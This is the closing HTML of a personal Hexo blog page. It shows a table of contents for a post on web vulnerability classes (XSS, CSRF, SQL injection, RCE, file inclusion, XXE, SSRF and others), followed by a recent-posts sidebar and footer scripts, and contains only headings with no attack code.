class="level-item">xss之盲打</span></span></a></li><li><a class="level is-mobile" href="#xss之过滤"><span class="level-left"><span class="level-item">1.2.7</span><span class="level-item">xss之过滤</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#绕过-script过滤"><span class="level-left"><span class="level-item">1.2.7.1</span><span class="level-item">绕过 &lt;SCRIPT&gt;过滤</span></span></a></li></ul></li><li><a class="level is-mobile" href="#xss之htmlspecialchars"><span class="level-left"><span class="level-item">1.2.8</span><span class="level-item">xss之htmlspecialchars</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#javascript伪协议是什么"><span class="level-left"><span class="level-item">1.2.8.1</span><span class="level-item">JavaScript伪协议是什么？</span></span></a></li></ul></li><li><a class="level is-mobile" href="#xss之js输出"><span class="level-left"><span class="level-item">1.2.9</span><span class="level-item">xss之js输出</span></span></a></li><li><a class="level is-mobile" href="#xss防范"><span class="level-left"><span class="level-item">1.2.10</span><span class="level-item">XSS防范</span></span></a></li></ul></li><li><a class="level is-mobile" href="#crsf"><span class="level-left"><span class="level-item">1.3</span><span class="level-item">CRSF</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#crsfget"><span class="level-left"><span class="level-item">1.3.1</span><span class="level-item">CRSF(get)</span></span></a></li><li><a class="level is-mobile" href="#crsfpost"><span class="level-left"><span class="level-item">1.3.2</span><span class="level-item">CRSF(post)</span></span></a></li><li><a class="level is-mobile" href="#crsftoken"><span class="level-left"><span class="level-item">1.3.3</span><span class="level-item">CRSF(Token)</span></span></a></li><li><a class="level is-mobile" href="#csrf防范"><span class="level-left"><span class="level-item">1.3.4</span><span class="level-item">CSRF防范</span></span></a></li></ul></li><li><a class="level is-mobile" href="#sql-inject"><span class="level-left"><span class="level-item">1.4</span><span class="level-item">SQL-Inject</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#数字型注入post"><span class="level-left"><span class="level-item">1.4.1</span><span class="level-item">数字型注入（post）</span></span></a></li><li><a class="level is-mobile" href="#字符型注入post"><span class="level-left"><span class="level-item">1.4.2</span><span class="level-item">字符型注入（POST）</span></span></a></li><li><a class="level is-mobile" href="#搜索型注入"><span class="level-left"><span class="level-item">1.4.3</span><span class="level-item">搜索型注入</span></span></a></li><li><a class="level is-mobile" href="#xx型注入"><span class="level-left"><span class="level-item">1.4.4</span><span class="level-item">xx型注入</span></span></a></li><li><a class="level is-mobile" href="#insertupdate注入"><span class="level-left"><span class="level-item">1.4.5</span><span class="level-item">&quot;insert/update&quot;注入</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#insert"><span class="level-left"><span class="level-item">1.4.5.1</span><span class="level-item">insert</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#updatexml"><span class="level-left"><span class="level-item">1.4.5.1.1</span><span class="level-item">updatexml</span></span></a></li><li><a class="level is-mobile" href="#extractvalue"><span class="level-left"><span class="level-item">1.4.5.1.2</span><span class="level-item">extractvalue</span></span></a></li><li><a class="level is-mobile" href="#floor"><span class="level-left"><span class="level-item">1.4.5.1.3</span><span class="level-item">floor</span></span></a></li></ul></li><li><a class="level is-mobile" href="#update"><span class="level-left"><span class="level-item">1.4.5.2</span><span class="level-item">update</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#updatexml-1"><span class="level-left"><span class="level-item">1.4.5.2.1</span><span class="level-item">updatexml</span></span></a></li><li><a class="level is-mobile" href="#extractvalue-1"><span class="level-left"><span class="level-item">1.4.5.2.2</span><span class="level-item">extractvalue</span></span></a></li><li><a class="level is-mobile" href="#floor-1"><span class="level-left"><span class="level-item">1.4.5.2.3</span><span class="level-item">floor</span></span></a></li></ul></li></ul></li><li><a class="level is-mobile" href="#delete注入"><span class="level-left"><span class="level-item">1.4.6</span><span class="level-item">delete注入</span></span></a></li><li><a class="level is-mobile" href="#http-header注入"><span class="level-left"><span class="level-item">1.4.7</span><span class="level-item">&quot;http header&quot;注入</span></span></a></li><li><a class="level is-mobile" href="#盲注base-on-boolian"><span class="level-left"><span class="level-item">1.4.8</span><span class="level-item">盲注（base on boolian）</span></span></a></li><li><a class="level is-mobile" href="#宽字节注入"><span class="level-left"><span class="level-item">1.4.9</span><span class="level-item">宽字节注入</span></span></a></li></ul></li><li><a class="level is-mobile" href="#rce"><span class="level-left"><span class="level-item">1.5</span><span class="level-item">RCE</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#exec-ping"><span class="level-left"><span class="level-item">1.5.1</span><span class="level-item">exec &quot;ping&quot;</span></span></a></li><li><a class="level is-mobile" href="#exec-eval"><span class="level-left"><span class="level-item">1.5.2</span><span class="level-item">exec &quot;eval&quot;</span></span></a></li></ul></li><li><a class="level is-mobile" href="#file-inclusion"><span class="level-left"><span class="level-item">1.6</span><span class="level-item">File Inclusion</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#file-inclusionlocal"><span class="level-left"><span class="level-item">1.6.1</span><span class="level-item">File Inclusion(local)</span></span></a></li><li><a class="level is-mobile" href="#file-inclusionremote"><span class="level-left"><span class="level-item">1.6.2</span><span class="level-item">File inclusion(remote)</span></span></a></li></ul></li><li><a class="level is-mobile" href="#unsafe-filedownload"><span class="level-left"><span class="level-item">1.7</span><span class="level-item">Unsafe Filedownload</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#unsafe-filedownload-1"><span class="level-left"><span class="level-item">1.7.1</span><span class="level-item">Unsafe Filedownload</span></span></a></li></ul></li><li><a class="level is-mobile" href="#unsafe-fileupload"><span class="level-left"><span class="level-item">1.8</span><span class="level-item">Unsafe Fileupload</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#client-check"><span class="level-left"><span class="level-item">1.8.1</span><span class="level-item">client check</span></span></a></li><li><a class="level is-mobile" href="#mime-type"><span class="level-left"><span class="level-item">1.8.2</span><span class="level-item">MIME type</span></span></a></li><li><a class="level is-mobile" href="#getimagesize"><span class="level-left"><span class="level-item">1.8.3</span><span class="level-item">getimagesize()</span></span></a></li></ul></li><li><a class="level is-mobile" href="#over-permission"><span class="level-left"><span class="level-item">1.9</span><span class="level-item">Over Permission</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#水平越权"><span class="level-left"><span class="level-item">1.9.1</span><span class="level-item">水平越权</span></span></a></li><li><a class="level is-mobile" href="#垂直越权"><span class="level-left"><span class="level-item">1.9.2</span><span class="level-item">垂直越权</span></span></a></li></ul></li><li><a class="level is-mobile" href="#section"><span class="level-left"><span class="level-item">1.10</span><span class="level-item">../../</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#目录遍历"><span class="level-left"><span class="level-item">1.10.1</span><span class="level-item">目录遍历</span></span></a></li></ul></li><li><a class="level is-mobile" href="#敏感信息泄露"><span class="level-left"><span class="level-item">1.11</span><span class="level-item">敏感信息泄露</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#icanseeyourabc"><span class="level-left"><span class="level-item">1.11.1</span><span class="level-item">IcanseeyourABC</span></span></a></li></ul></li><li><a class="level is-mobile" href="#php反序列化"><span class="level-left"><span class="level-item">1.12</span><span class="level-item">PHP反序列化</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#php反序列化漏洞"><span class="level-left"><span class="level-item">1.12.1</span><span class="level-item">PHP反序列化漏洞</span></span></a></li></ul></li><li><a class="level is-mobile" href="#xxe"><span class="level-left"><span class="level-item">1.13</span><span class="level-item">XXE</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#xxe漏洞"><span class="level-left"><span class="level-item">1.13.1</span><span class="level-item">XXE漏洞</span></span></a></li></ul></li><li><a class="level is-mobile" href="#url重定向"><span class="level-left"><span class="level-item">1.14</span><span class="level-item">URL重定向</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#不安全的url跳转"><span class="level-left"><span class="level-item">1.14.1</span><span class="level-item">不安全的URL跳转</span></span></a></li></ul></li><li><a class="level is-mobile" href="#ssrf"><span class="level-left"><span class="level-item">1.15</span><span class="level-item">SSRF</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#ssrfcurl"><span class="level-left"><span class="level-item">1.15.1</span><span class="level-item">SSRF(curl)</span></span></a></li><li><a class="level is-mobile" href="#ssrffile_get_content"><span class="level-left"><span class="level-item">1.15.2</span><span class="level-item">SSRF(file_get_content)</span></span></a></li></ul></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><figure class="media-left"><a class="image" href="/post/9c1a1a1.html"><img src="/img/article/17.png" alt="luogu_1"></a></figure><div class="media-content"><p class="date"><time dateTime="2024-10-08T10:50:27.000Z">2024-10-08</time></p><p class="title"><a href="/post/9c1a1a1.html">luogu_1</a></p><p class="categories"><a href="/categories/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/">数据结构</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/post/7684f23b.html"><img src="/img/article/15.png" alt="T2I"></a></figure><div class="media-content"><p class="date"><time dateTime="2024-09-23T06:17:27.000Z">2024-09-23</time></p><p class="title"><a href="/post/7684f23b.html">T2I</a></p><p class="categories"><a href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/post/e4cc0182.html"><img src="/img/article/16.png" alt="Explainable_ML"></a></figure><div class="media-content"><p class="date"><time dateTime="2024-09-23T06:15:08.000Z">2024-09-23</time></p><p class="title"><a href="/post/e4cc0182.html">Explainable_ML</a></p><p class="categories"><a href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-08-18T02:04:22.000Z">2024-08-18</time></p><p class="title"><a href="/post/374aa791.html">leetcode-daily-practice</a></p><p class="categories"><a href="/categories/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/">数据结构</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/post/cda691ed.html"><img src="/img/article/13.png" alt="FGSM &amp; PDG"></a></figure><div class="media-content"><p class="date"><time dateTime="2024-07-02T08:20:29.000Z">2024-07-02</time></p><p class="title"><a href="/post/cda691ed.html">FGSM &amp; PDG</a></p><p class="categories"><a href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p></div></article></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">BeautyFlower</a><p class="is-size-7"><span>&copy; 2024 yyyyyyxnp</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">Visited by <span id="busuanzi_value_site_uv">0</span> users</span></p><p class="is-size-7">© 2019</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/deng12yx"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'folded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/javascript" id="MathJax-script" async>MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      },
      svg: {
        fontCache: 'global'
      },
      chtml: {
        matchFontHeight: false
      }
    };</script><script src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>